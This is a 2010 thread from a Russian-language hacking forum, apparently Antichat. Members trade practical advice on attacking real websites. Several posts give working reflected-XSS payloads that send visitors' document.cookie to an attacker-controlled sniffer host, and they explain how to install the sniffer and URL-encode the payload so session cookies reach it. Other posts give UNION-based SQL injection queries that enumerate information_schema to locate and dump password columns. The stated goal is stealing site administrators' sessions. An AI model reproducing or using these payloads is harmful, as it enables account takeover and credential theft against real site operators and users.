 |
|
11.07.2010, 15:35
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от Konqi
не знаю как вы но я никогда не использовал программы чтобы найти или автоматически раскрутить скул,
от этого одни минусы
1. вы не осваиваете sql инъекцию хорошо
2. вы доверяете программу которая может ошибиться
3. и этот взлом даже не можете считать вашим (это чистое мнение)
однажды я раскрутил скул до паролей, походу было два запроса и поэтому немного потрудилась над колонками..
потом скул даль программу
havij
которая считается крутой тулзой,и программа не смог раскрутить скул
sql инъекции бывают такими разными что программно раскрутить все это не реально(я так думаю)
вообщем дело ваше, простите за оффтоп(если это оффтоп)
когда тебе нужно просмотреть кучу баз и кучу таблиц, то ручками ты потеряешь довольно много времени, ну а если это можно сделать программно, то зачем же его терять? если программно не получилось, то тогда да, нужно уже руками делать
|
|
|
11.07.2010, 15:38
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Seravin
когда тебе нужно просмотреть кучу баз и кучу таблиц, то ручками ты потеряешь довольно много времени, ну а если это можно сделать программно, то зачем же его терять? если программно не получилось, то тогда да, нужно уже руками делать
Естественно, когда уже скуль найдена и вывод есть, то дампить или выводить данные можно программно - лично я так и делаю. А искать вручную.
|
|
|
|
11.07.2010, 17:53
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
С нами:
9709737
Репутация:
88
|
|
Верно, согласен, ищешь для начала в ручную, потому как проги далеко не все жрут и находят, а пот дампить 200к записей в ручную, это абсолютно не реально, а вот если только пасс накопать, тогда понятно, можно и ручками.
Сори за оффтоп
|
|
|
|
11.07.2010, 22:12
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
С нами:
8395840
Репутация:
5
|
|
Глуповатый вопрос. Например, нашел я пару пассивных хссок на одном сайте... Что дальше? Нужно взять где-то исходники сниффера и поставить их на каком-нибудь хосте, или можно воспользоваться античатовским сниффером? Какой код надо сунуть в урл, чтобы куки отправлялись на сниффер?
Не пинайте только)
/thread20140.html - это читал, но не нашел (или не понял) ответа(( |
|
|
|
11.07.2010, 22:34
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами:
8718197
Репутация:
11
|
|
Сообщение от Boa
Глуповатый вопрос. Например, нашел я пару пассивных хссок на одном сайте... Что дальше?
Если на сайте с авторизацией, то сунуть админу, если нет - забить.
Сообщение от Boa
Нужно взять где-то исходники сниффера и поставить их на каком-нибудь хосте, или можно воспользоваться античатовским сниффером?
Ачатовский не пашет, есть другие, но можно поставить свой. Можешь поискать сниф от Kanick'a _http://www.kanick.ru/sniffer/
Сообщение от Boa
Какой код надо сунуть в урл, чтобы куки отправлялись на сниффер?
Не пинайте только)
/thread20140.html
- это читал, но не нашел (или не понял) ответа(( Почитай еще, там есть ответ на твой последний вопрос..
Сообщение от None
###Как его подставить к ссылке с Xss?
Да очень легко...
Есть несколко вариантов:
- 1)делаем вот так:
http://*****.ru/free?p='>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;
где **** сайт с Xss.
Вот сам составленый скрипт:
'>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;
- 2)Можно ещё делать вот так:
http://*****.ru/free?p='>
где обращаетса к http://haknet.h16.ru/script/js.js
а в js.js есть:
img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;
этот способ более надёжен.
|
|
|
|
11.07.2010, 23:11
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
С нами:
8395840
Репутация:
5
|
|
Сообщение от None
Если на сайте с авторизацией, то сунуть админу, если нет - забить.
Есть)
Сообщение от None
Ачатовский не пашет, есть другие, но можно поставить свой. Можешь поискать сниф от Kanick'a _http://www.kanick.ru/sniffer/
Персонал-версию скачал, поставил на хосте, конфиг оставил как есть. Попробовал дать залогиненному юзеру ссылку с
Код:
img=new Image();img.src="http://*****.ru/sniffer/i.gif?"+document.cookie;"+document.cookie;
, и ссылку с
Код:
img=new Image();img.src="http://*****.ru/sniffer/s.gif?"+document.cookie;"+document.cookie;
, т.к. не знаю, адрес какой картинки подставлять) Но на сниффер ничего не пришло. Или я совсем туплю и нужно указывать адрес вовсе не к картинке? Запутался.
|
|
|
|
11.07.2010, 23:26
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами:
8718197
Репутация:
11
|
|
2Boa
качай делюкс _ссылка самоуничтожится через 5 минут
+ надо немного подправить конф ($sniffer_path = "http://sniffer_path/")
+ там есть немного фака
имхо, но лучше так
http://*****.ru/free?p='>
где обращаетса к http://haknet.h16.ru/script/js.js
а в js.js есть:
img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;
этот способ более надёжен.
ПС
сылка должнa быть не на нартинку (i.gif) а на скрипт(s.gif)
|
|
|
|
11.07.2010, 23:47
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
С нами:
8395840
Репутация:
5
|
|
Код:
http://******.ru/archive.php?year=img=new Image();img.src="http://******.ru/sniffer/s.gif?"+document.cookie;"+document.cookie;
Что тут неправильно?( Путь в конфиге прописал.
Второй вариант трудоемок, а у меня два ночи) попробую потом. |
|
|
|
12.07.2010, 00:01
|
|
Новичок
Регистрация: 04.12.2005
Сообщений: 6
С нами:
10753628
Репутация:
1
|
|
Сообщение от Dare
Decoy
хм... пробуй такой запрос site.com/fail.php?id=-1+union+select
+GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NA ME)+SEPARATOR+0x3C62723E)+from+information_schema. columns+where+column_name+like+0x257061737325+or+c olumn_name+like+0x25702577256425--+
Далее из полученных таблиц выводи имена колонок:
site.com/fail.php?id=-1+union+select
+GROUP_CONCAT(column_name)+SEPARATOR+0x3C62723E)+f rom+information_schema.columns+where+table_name=з ахексенное.имя.таблицы--+
получаешь имена колонок, и:
site.com/fail.php?id=-1+union+select
+concat_ws(0x3a,имена необходимых колонок)+from+iимя.таблицы--+ (если не будет вывода через точку имя_базы.имя_таблицы)
ЗЫ: +(пробел) перед коментариями не нужен) =) всего)
Привет!
Спасибо за ответ! Первый запрос не отработал - результат тот же (долгая загрузка, пустая страница).
Интересное наблюдение:
Код:
http://example.com/detail.php?id=-1+union+select+1,2,3,4,5+from+information_schema.user_privileges--+
работает, а
Код:
http://example.com/detail.php?id=-1+union+select+1,2,3,4,5+from+information_schema.tables--+
нет.
Получается, смотреть некоторые таблицы из INFORMATION_SCHEMA удается, другие - нет. Причем не сильно похоже на разграничение доступа, в противном случае была бы ошибка.
|
|
|
|
12.07.2010, 00:08
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Boa
Код:
http://******.ru/archive.php?year=img=new Image();img.src="http://******.ru/sniffer/s.gif?"+document.cookie;"+document.cookie;
Что тут неправильно?( Путь в конфиге прописал.
Второй вариант трудоемок, а у меня два ночи) попробую потом.
Сообщение от None
img=new Image();
Пробел видишь ? Там после передачи будет стоять %20
А выглядеть он будет так :
Сообщение от None
img=new%20Image();
Чтобы там был пробел после передачи надо поставить +.
это во первых, а во вторых везде где стоять + замени их на %2b,после передачи там автоматически будет стоять +,если не поставишь %2b там будет стоять пробел
Вот например:
Код:
http://*.ru/archive.php?year=img=new+Image();img.src="http://*.ru/sniffer/s.gif?"%2bdocument.cookie;"
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
